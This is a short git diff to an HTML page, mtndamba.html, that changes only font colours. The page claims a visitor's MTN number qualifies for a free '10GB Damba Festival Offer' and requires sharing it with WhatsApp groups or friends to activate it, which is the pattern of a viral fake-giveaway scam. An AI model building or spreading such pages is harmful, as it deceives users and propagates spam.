--- a/mtndamba.html
+++ b/mtndamba.html
@@ -418,9 +418,9 @@ button:hover {
         </div>
         <div id="share">
 
-          <p class="tip"> <font color="green">Congratulations, your MTN Number </font><span id="getname"></span>،</p>
+          <p class="tip"> <font color="black">Congratulations, your MTN Number </font><span id="getname"></span>،</p>
             <p class="tip">
-              <font color="#000000">is Eligible to receive 10GB Damba Festival Offer</font><br/><span class="amount"> <font color="white">Proceed to Activate your 10gb now</font></span><br>
+              <font color="#000000">is Eligible to receive 10GB Damba Festival Offer</font><br/><span class="amount"> <font color="green">Proceed to Activate your 10gb now</font></span><br>
               <font color="#000000"> How to proceed:</font>
             </p><br><font color="#000000">
             <p class="tip">1. Share it with 5 groups or 15 friends on WhatsApp (Click on the "SHARE" icon below).</p>
